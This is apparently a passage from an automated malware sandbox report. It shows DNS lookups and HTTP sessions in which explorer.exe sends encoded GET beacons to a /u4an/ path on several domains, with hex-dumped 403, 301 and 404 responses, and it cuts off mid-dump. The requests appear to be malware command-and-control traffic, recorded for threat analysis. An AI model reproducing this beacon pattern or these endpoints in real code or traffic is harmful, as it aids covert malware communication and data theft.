Sep 27, 2021 17:33:08.168354034 CEST | 8.8.8.8 | 192.168.2.22 | 0x9ff7 | No error (0) | www.lianxiwan.xyz | | 101.35.124.222 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:33:11.279463053 CEST | 8.8.8.8 | 192.168.2.22 | 0x1d11 | No error (0) | www.area-arquitectos.com | | 93.185.100.223 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.wwiilive.com
• www.dunedinhyperlocal.com
• www.oinfoproduto.com
• www.multicoininvestment.com
• www.theseattlenotary.com
• www.petersonmovingco.com
• www.quinnwebster.top

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:31:56.380229950 CEST | 0 | OUT | GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1
Host: www.wwiilive.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 17:31:56.559993982 CEST | 1 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 27 Sep 2021 15:31:56 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6151bf8f-113"
Via: 1.1 google
Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:32:01.790482998 CEST | 2 | OUT | GET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1
Host: www.dunedinhyperlocal.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 17:32:02.171308994 CEST | 2 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.20.1
Date: Mon, 27 Sep 2021 15:32:02 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: https://www.dunedinhyperlocal.com/u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 216.172.172.208 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:32:07.491132975 CEST | 3 | OUT | GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1
Host: www.oinfoproduto.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 17:32:08.474100113 CEST | 3 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 27 Sep 2021 15:32:07 GMT
Server: Apache
X-UA-Compatible: IE=edge
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, close
Location: http://oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw==
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49168 | 162.0.229.241 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:32:18.785186052 CEST | 4 | OUT | GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1
Host: www.multicoininvestment.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 17:32:18.948822021 CEST | 6 | IN | HTTP/1.1 301 Moved Permanently
keep-alive: timeout=5, max=100
content-type: text/html
content-length: 707
date: Mon, 27 Sep 2021 15:32:18 GMT
server: LiteSpeed
location: https://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA==
x-turbo-charged-by: LiteSpeed
connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 
63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49169 | 162.0.232.162 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:32:24.141268015 CEST | 6 | OUT | GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1
                                                                  Host: www.theseattlenotary.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
Sep 27, 2021 17:32:24.307697058 CEST | 8 | IN | HTTP/1.1 301 Moved Permanently
                                                                  keep-alive: timeout=5, max=100
                                                                  content-type: text/html
                                                                  content-length: 707
                                                                  date: Mon, 27 Sep 2021 15:32:24 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz
                                                                  x-turbo-charged-by: LiteSpeed
                                                                  connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 
63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.22 | 49170 | 216.239.32.21 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:32:29.450268984 CEST | 8 | OUT | GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1
                                                                  Host: www.petersonmovingco.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
Sep 27, 2021 17:32:29.531821966 CEST | 10 | IN | HTTP/1.1 200 OK
                                                                  Content-Type: text/html; charset=utf-8
                                                                  x-ua-compatible: IE=edge
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Mon, 27 Sep 2021 15:32:29 GMT
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Cross-Origin-Opener-Policy: unsafe-none
                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Q2VDqHH8JEhHLrd9BvMcDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Server: ESF
                                                                  X-XSS-Protection: 0
                                                                  X-Content-Type-Options: nosniff
                                                                  Set-Cookie: NID=511=Wbsymr0SWWRHD-rgYevkhlyxEht6VWs54689I0H8buzMRXggbGvzdbaW38cH3R9CI0-WqXrcOYZhJqr4bhoRK_izgLLSbsYN41B7yTQNTDIkOaKP9zhPiH4b7pQo9_Dxe6RieNOgYlXHOAGFDnfGUZNbKpODKC8TiUvlRaTWHjc; expires=Tue, 29-Mar-2022 15:32:29 GMT; path=/; domain=.google.com; HttpOnly
                                                                  Accept-Ranges: none
                                                                  Vary: Accept-Encoding
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 6f 63 61 6c 42 75 73 69 6e 65 73 73 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 51 32 56 44 71 48 48 38 4a 45 68 48 4c 72 64 39 42 76 4d 63 44 77 22 3e 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 20 3d 20 7b 22 44 70 69 6d 47 66 22 3a 66 61 6c 73 65 2c 22 45 35 7a 41 58 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 72 6b 73 70 61 63 65 2e 67 6f 6f 67
Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/LocalBusiness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="Q2VDqHH8JEhHLrd9BvMcDw">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.goog
Sep 27, 2021 17:32:29.531872034 CEST | 11 | IN | Data Raw: 6c 65 2e 63 6f 6d 22 2c 22 45 50 31 79 6b 64 22 3a 5b 22 2f 5f 2f 2a 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 2f 2a 22 2c 22 2f 70 6f 73 74 73 2f 6c 2f 3a 6c 69 73 74 69 6e 67 49
                                                                  Data Ascii: le.com","EP1ykd":["/_/*","/local/business","/local/business/*","/posts/l/:listingId","/restaurants","/restaurants/*","/website/_/*","/website/demo","/website/demo/","/website/demo/*"],"FdrFJe":"2807620777109307761","Im6cmf":"/_/GeoMerchantPres
Sep 27, 2021 17:32:29.531902075 CEST | 13 | IN | Data Raw: 55 69 22 2c 22 71 79 61 6f 64 63 22 3a 66 61 6c 73 65 2c 22 71 79 6d 56 65 22 3a 22 78 76 65 5f 4b 4c 4d 6a 76 46 74 73 6a 34 41 51 7a 4c 30 64 47 5f 35 58 37 2d 51 22 2c 22 72 74 51 43 78 63 22 3a 2d 31 32 30 2c 22 72 76 4f 6c 46 64 22 3a 22 50
                                                                  Data Ascii: Ui","qyaodc":false,"qymVe":"xve_KLMjvFtsj4AQzL0dG_5X7-Q","rtQCxc":-120,"rvOlFd":"PAGE_SOURCE_UNKNOWN","tHwb2":false,"v9NS6b":"27071008839149950","vVkaEb":"","vXmutd":"%.@.\"CH\",\"ZZ\",\"ub2WSA\\u003d\\u003d\"]","w2btAe":"%.@.null,null,\"\",tr
Sep 27, 2021 17:32:29.531925917 CEST | 14 | IN | Data Raw: 65 66 61 75 6c 74 56 69 65 77 3b 69 66 28 65 26 26 65 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 26 26 28 65 3d 65 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 63 29 2c 22 30 70 78 22 3d 3d 65 2e 68 65 69 67 68 74 7c 7c 22 30 70
                                                                  Data Ascii: efaultView;if(e&&e.getComputedStyle&&(e=e.getComputedStyle(c),"0px"==e.height||"0px"==e.width||"hidden"==e.visibility&&!g))return!1;if(!c.getBoundingClientRect)return!0;e=c.getBoundingClientRect();c=e.left+a.pageXOffset;g=e.top+a.pageYOffset;
Sep 27, 2021 17:32:29.531981945 CEST | 15 | IN | Data Raw: 68 69 64 64 65 6e 3b 63 6f 6c 6f 72 3a 23 32 30 32 31 32 34 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72
                                                                  Data Ascii: hidden;color:#202124;font-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif;margin:0;text-size-adjust:100%}textarea{font-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif}a{text-decoration:none;color:#1967d2}img{border:none}#apps-debug-t
Sep 27, 2021 17:32:29.532075882 CEST | 17 | IN | Data Raw: 61 75 74 6f 7d 2e 77 37 57 49 47 62 20 2e 53 56 70 50 63 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 70 78 29 20 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29 7d 2e 77 37 57 49 47 62 20 2e 79 35 42 7a 33 7b 6f 70 61 63
                                                                  Data Ascii: auto}.w7WIGb .SVpPcd{transform:translateY(-5px) rotate(-45deg)}.w7WIGb .y5Bz3{opacity:0}.w7WIGb .ihSjwf{transform:translateY(5px) rotate(45deg)}@keyframes quantumWizBoxInkSpread{0%{transform:translate(-50%,-50%) scale(.2)}to{transform:translat
Sep 27, 2021 17:32:29.532104969 CEST | 18 | IN | Data Raw: 6f 76 65 72 2c 2e 65 33 44 75 75 62 20 61 3a 6c 69 6e 6b 2c 2e 65 33 44 75 75 62 20 61 3a 76 69 73 69 74 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 31 61 37 33 65 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 48 51 38 79 66 2c 2e 48 51 38 79 66 20
                                                                  Data Ascii: over,.e3Duub a:link,.e3Duub a:visited{background:#1a73e8;color:#fff}.HQ8yf,.HQ8yf a{color:#1a73e8}.UxubU,.UxubU a{color:#fff}.ZFr60d{position:absolute;top:0;right:0;bottom:0;left:0;background-color:transparent}.O0WRkf.u3bW4e .ZFr60d{background
Sep 27, 2021 17:32:29.532128096 CEST | 19 | IN | Data Raw: 69 72 63 6c 65 20 66 61 72 74 68 65 73 74 2d 73 69 64 65 2c 72 67 62 61 28 32 36 2c 31 31 35 2c 32 33 32 2c 30 2e 31 36 31 29 2c 72 67 62 61 28 32 36 2c 31 31 35 2c 32 33 32 2c 30 2e 31 36 31 29 20 38 30 25 2c 72 67 62 61 28 32 36 2c 31 31 35 2c
                                                                  Data Ascii: ircle farthest-side,rgba(26,115,232,0.161),rgba(26,115,232,0.161) 80%,rgba(26,115,232,0) 100%)}.e3Duub .Vwe4Vb{background-image:radial-gradient(circle farthest-side,rgba(255,255,255,0.322),rgba(255,255,255,0.322) 80%,rgba(255,255,255,0) 100%)}
Sep 27, 2021 17:32:29.532151937 CEST | 21 | IN | Data Raw: 68 65 69 67 68 74 20 30 2e 32 73 20 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 30 2c 30 2e 30 2c 30 2e 32 2c 31 29 20 2c 6f 70 61 63 69 74 79 20 30 2e 30 35 73 20 6c 69 6e 65 61 72 2c 74 6f 70 20 30 2e 32 73 20 63 75 62 69 63 2d 62 65 7a 69
                                                                  Data Ascii: height 0.2s cubic-bezier(0.0,0.0,0.2,1) ,opacity 0.05s linear,top 0.2s cubic-bezier(0.0,0.0,0.2,1)}.JPdR6b.jVwmLb{max-height:56px;opacity:0}.JPdR6b.CAwICe{overflow:hidden}.JPdR6b.oXxKqf{transition:none}.z80M1{color:#222;cursor:pointer;display
Sep 27, 2021 17:32:29.532176971 CEST | 22 | IN | Data Raw: 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 63 69 72 63 6c 65 20 66 61 72 74 68 65 73 74 2d 73 69 64 65 2c 23 62 64 63 31 63 36 2c 23 62 64 63 31 63 36 20 38 30 25 2c 72 67 62 61 28 31 38 39 2c
                                                                  Data Ascii: ackground-image:radial-gradient(circle farthest-side,#bdc1c6,#bdc1c6 80%,rgba(189,193,198,0) 100%);background-size:cover;opacity:1;top:0;left:0}.J0XlZe{color:inherit;line-height:40px;padding:0 6px 0 1em}.a9caSc{color:inherit;direction:ltr;padd
Sep 27, 2021 17:32:29.544748068 CEST | 23 | IN | Data Raw: 61 6c 65 58 28 30 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 35 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 35 29 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 25 29 7d 7d 2e 46 4b 46 36 6d 63 2c 2e
                                                                  Data Ascii: aleX(0)}50%{transform:scaleX(5)}to{transform:scaleX(5) translateX(100%)}}.FKF6mc,.FKF6mc:focus{display:block;outline:none;text-decoration:none}.FKF6mc:visited{fill:inherit;stroke:inherit}.U26fgb.u3bW4e{outline:1px solid transparent}.C0oVfc{lin


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.22 | 49171 | 162.251.85.174 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:32:39.962572098 CEST | 52 | OUT | GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1
                                                                  Host: www.quinnwebster.top
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
Sep 27, 2021 17:32:40.120680094 CEST | 53 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Mon, 27 Sep 2021 15:32:40 GMT
                                                                  Server: nginx/1.19.5
                                                                  Content-Type: text/html
                                                                  Content-Length: 583
                                                                  Last-Modified: Sat, 24 Jul 2021 10:05:02 GMT
                                                                  Accept-Ranges: bytes
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 